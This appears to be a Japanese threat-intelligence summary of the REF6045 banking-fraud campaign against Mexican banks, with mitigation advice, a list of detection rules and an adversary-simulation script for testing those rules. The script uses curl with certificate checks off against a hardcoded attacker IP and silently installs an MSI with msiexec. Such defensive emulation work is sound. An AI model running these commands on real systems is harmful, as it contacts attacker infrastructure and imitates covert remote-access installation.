ClickFixからキャッシュアウトへ:メキシコ銀行詐欺ツールキットの分析
Detection stack
- AIDR
- Alert
- ETL
- Query
概要
REF6045は、メキシコの金融セクターを対象としたオペレーター支援型の銀行詐欺キャンペーンです。偽のCAPTCHAページを伴ったClickFixスタイルの配信方法を使用して、被害者に悪意のあるPowerShellコマンドを実行させます。感染後、SCMBANKERツールキットは、銀行のセッションを観察し、スクリーンショットをキャプチャし、クリップボードの内容を変更し、完全なリモート制御を可能にするRemote Utilities RATを展開します。
調査
Elastic Security Labsは、以下を検出した後に脅威を発見しました bitsadmin オープンディレクトリからPowerShellスクリプトをダウンロードする活動。この調査で、公開アクセスが可能なweb-rootアーカイブ、 zkt.zipを通じて完全なツールキットが明らかになり、認証されていないファイルエディタやコマンドアンドコントロールインフラストラクチャ上のオープンディレクトリを含む主要な運用上のセキュリティの弱点が露呈しました。分析により、ツールキットにはコードベースに広範なAI生成のアーティファクトが含まれていることも判明しました。
緩和策
組織はPowerShellの使用を制限し、 bitsadmin 承認されたユーザーのみとし、厳格な実行制御を適用すべきです。ユーザーは、偽のCAPTCHAプロンプトや偽のWindows Update画面などの社会工学的対策を識別するために訓練するべきです。セキュリティチームは、不審なレジストリの変更やリモートアクセスソフトウェアの無許可のインストールについても強力な監視を展開するべきです。
対応
この活動が検出された場合、指令と制御の通信および可能なデータ盗難を防ぐために、影響を受けたシステムを直ちに隔離します。妥協の範囲を特定し、リモートユーティリティや無許可のレジストリ変更がないかを確認するためのフォレンジック調査を実施してください。影響を受けたマシンからアクセスされたすべての金融およびその他の機密アカウントのパスワードをリセットしてください。
攻撃フロー
検出
Shellプロセスによって起動されたMsiExec(cmdline経由)
表示
Attrib実行によるファイル非表示(cmdline経由)
表示
パブリックユーザープロファイルにおける不審なファイル(file_event経由)
表示
隠されたPowerShellコマンドラインを通じた実行の可能性(cmdline経由)
表示
システムの停止や再起動を強制するためのシャットダウン(cmdline経由)
表示
LOLBAS Bitsadmin(cmdline経由)
表示
実行の遅延挙動の可能性(cmdline経由)
表示
アカウントまたはグループの列挙/操作の可能性(cmdline経由)
表示
Microsoft Edgeが異常なプロセスを生成する(cmdline経由)
表示
CURLの不審な使用法(cmdline経由)
表示
不審な実行可能ファイル/スクリプトの実行位置(cmd.exe /C経由)(cmdline経由)
表示
SCMBANKERおよびRemote Utilitiesインストールの検出[Windowsプロセス作成]
表示
SCMBANKERツールキット活動検出[Windows PowerShell]
表示
シミュレーション実行
前提条件: テレメトリとベースラインプリフライトチェックがパスする必要があります。
理由: このセクションでは、検出ルールをトリガーするために設計された敵対的技術(TTP)の正確な実行を詳述しています。コマンドとストーリーは、特定されたTTPを直接反映し、検出ロジックによって期待される正確なテレメトリを生成することを目的としています。抽象的または無関係な例は誤診につながります。
-
攻撃のストーリーとコマンド: 敵対者は、REF6045銀行詐欺パターンを模倣することで標的システムに足場を確立しようとします。最初に、ハードコーディングされた悪意のあるIPアドレス(
68.211.161.46)から検証ファイルをダウンロードしようとしますcurlを使用し-k(非セキュア)フラグを設定してSSL証明書検証をバイパスします。ダウンロード後、敵対者は、msiexec.exeを使用し/i(インストール)および/quiet(サイレント)スイッチを使用して、hosts.msiという名前のファイルをターゲットに悪意のあるリモートアクセスツールのサイレントインストールを実行します。これにより、ユーザーの操作を最小限に抑えつつ持続的なリモートアクセスを得ることができます。 -
回帰テストスクリプト:
# REF6045 TTPのシミュレーションスクリプト # このスクリプトは、検出ルールで定義された特定のコマンドラインを模倣します。 $WorkDir = "$env:TEMPSimulation" if (!(Test-Path $WorkDir)) { New-Item -ItemType Directory -Path $WorkDir } Set-Location $WorkDir Write-Host "[+] ステップ 1:curlを介した侵入ツール転送のシミュレーション..." -ForegroundColor Cyan # Note: 不正なトラフィックを避けるためにcurl経由で偽ファイルを使用しますが、 # 検出に必要な具体的なコマンドライン文字列を保持しています。 cmd /c curl -k https://68.211.161.46/validation.txt Write-Host "[+] ステップ 2:サイレントMSIインストールのシミュレーション..." -ForegroundColor Cyan # msiexecが即座にエラーを出さないようにダミーのMSIファイルを作成します(ルールはコマンドラインでトリガーされます) # 純粋に検出ロジック(コマンドライン)をテストするために、 # 正確なコマンド文字列を実行します。 msiexec /i "hosts.msi" /quiet /norestart -
クリーンアップコマンド:
# アーティファクトを削除するためのクリーンアップスクリプト $WorkDir = "$env:TEMPSimulation" if (Test-Path $WorkDir) { Remove-Item -Recurse -Force $WorkDir Write-Host "[+] クリーンアップ完了: $WorkDirを削除しました。" -ForegroundColor Green } else { Write-Host "[!] クリーンアップをスキップ: ディレクトリが見つかりません。" -ForegroundColor Yellow }